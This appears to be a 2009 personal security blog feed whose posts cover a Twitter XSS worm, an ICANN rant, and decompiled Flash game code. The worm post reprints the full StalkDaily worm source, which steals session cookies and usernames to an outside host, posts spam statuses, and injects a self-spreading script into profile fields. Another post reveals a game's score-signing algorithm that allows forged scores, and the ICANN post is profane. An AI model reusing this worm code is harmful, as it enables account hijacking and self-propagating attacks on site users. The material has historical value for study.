Current Topic: Miscellaneous
Another Ajax powered XSS worm
Topic: Miscellaneous10:06 pm EDT, Apr 12, 2009
An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, maybe it does. ;-)
Update: Source
function XHConn()
{
var xmlhttp, bComplete = false;
try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) { try { xmlhttp = new XMLHttpRequest(); }
catch (e) { xmlhttp = false; }}}
if (!xmlhttp) return null;
this.connect = function(sURL, sMethod, sVars, fnDone)
{
if (!xmlhttp) return false;
bComplete = false;
sMethod = sMethod.toUpperCase();
try {
if (sMethod == "GET")
{
xmlhttp.open(sMethod, sURL+"?"+sVars, true);
sVars = "";
}
else
{
xmlhttp.open(sMethod, sURL, true);
xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
xmlhttp.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
}
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && !bComplete)
{
bComplete = true;
fnDone(xmlhttp);
}};
xmlhttp.send(sVars);
}
catch(z) { return false; }
return true;
};
return this;
}
function urlencode( str ) {
var histogram = {}, tmp_arr = [];
var ret = str.toString();
var replacer = function(search, replace, str) {
var tmp_arr = [];
tmp_arr = str.split(search);
return tmp_arr.join(replace);
};
histogram["'"] = '%27';
histogram['('] = '%28';
histogram[')'] = '%29';
histogram['*'] = '%2A';
histogram['~'] = '%7E';
histogram['!'] = '%21';
histogram['%20'] = '+';
ret = encodeURIComponent(ret);
for (search in histogram) {
replace = histogram[search];
ret = replacer(search, replace, ret)
}
return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
return "%"+m2.toUpperCase();
});
return ret;
}
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
function wait()
{
var content = document.documentElement.innerHTML;
authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);
var randomUpdate=new Array();
randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
randomUpdate[1]="Join www.StalkDaily.com everyone!";
randomUpdate[2]="Woooo, www.StalkDaily.com :)";
randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
randomUpdate[4]="Wow...www.StalkDaily.com";
randomUpdate[5]="@twitter www.StalkDaily.com";
var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
updateEncode = urlencode(genRand);
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);
Another Ajax powered XSS worm
Topic: Miscellaneous11:32 pm EDT, Apr 8, 2009
The familiar .com, .net, .org and 18 other suffixes — officially "generic top-level domains" — could be joined by a seemingly endless stream of new ones next year under a landmark change approved last summer by the Internet Corp. for Assigned Names and Numbers, the entity that oversees the Web's address system.
Tourists might find information about the Liberty Bell, for example, at a site ending in .philly. A rapper might apply for a Web address ending in .hiphop.
"Whatever is open to the imagination can be applied for," says Paul Levins, ICANN's vice president of corporate affairs. "It could translate into one of the largest marketing and branding opportunities in history."
ICANN needs to be stopped. They proposing and prompting concepts that will irrevocably damage the Internet with essentially no one to keep them in check.
Something seriously must be done about the pollution of the TLDs.
From RFC 1591 in 1994:
2. The Top Level Structure of the Domain Names
In the Domain Name System (DNS) naming of computers there is aIt is extremely unlikely that
Postel must be screaming in his grave to know ICANN rolled like a dog in heat to special interests and already created bullshit TLDs like:
*.aero
This is insanity. ICANN's mission statement is not to facilitate "the largest marketing and branding opportunities in history." Its to manage and preserve the operational stability of the Internet's addressing systems! When the hell did it become being a stooge for the world's ISPs?
Fuck. This. Shit.
ICANN == Whores
Topic: Miscellaneous 9:48 am EDT, Apr 6, 2009
Very cool. The drums fit well with this song.
Lux Aeterna Cover
Practical uses of SWFScan
Topic: Miscellaneous 2:46 pm EDT, Apr 1, 2009
Or: How Billy hacked Zombie Hooker Nightmare to get his name on TV during [adult swim] .
public static function submit(arg0:String, arg1:Number) : String
{
strURI = null;
nGameId = null;
nScore = NaN;
nTime = NaN;
strTime = null;
strN1 = null;
strN2 = null;
n1 = NaN;
n2 = NaN;
nAlgo = NaN;
strToPass = null;
encrypted_data = null;
submission_data = null;
variables = null;
request = null;
gameID = arg0;
score = arg1;
try {
strURI = ExternalInterface.call("getLittleServer");
nGameId = gameID;
nScore = score;
nTime = ExternalInterface.call("getSrvrTime");
strTime = toString();
strN1 = substr(253, 3);
strN2 = substr(252, 3);
n1 = parseInt(strN1);
n2 = parseInt(strN2);
nAlgo = n1 * n2 * nScore + nScore;
strToPass = nGameId + "," + nScore + "," + nTime + "," + nAlgo;
//**********************
//**********************
//**********************
encrypted_data = MD5.hash(strToPass);
submission_data = "score=" + nScore + "|gameId=" + nGameId + "|timestamp=" + nTime + "|key=" + encrypted_data;
//**********************
//**********************
//**********************
variables = new URLVariables();
variables.attr1 = submission_data;
request = new URLRequest(strURI);
request.data = variables;
navigateToURL(request, "_self");
return submission_data;
} catch (e:Error) {
var loc1:* = e;
gameID = null;
}
return null;
}
Practical uses of SWFScan
Topic: Miscellaneous 1:00 pm EDT, Apr 1, 2009
I love getting the emails that go:
Dear Billy,
blah blah blah, tried every possible option, blah blah blah, new rule, blah blah blah, nothing I can do.
When really they just could have written: "Dear Billy, Fuck You."
...
Topic: Miscellaneous10:17 pm EDT, Mar 24, 2009
Caleb: What do you think Jeff? Did you like it?
ahhhh memories.
SPI Labs Dinner
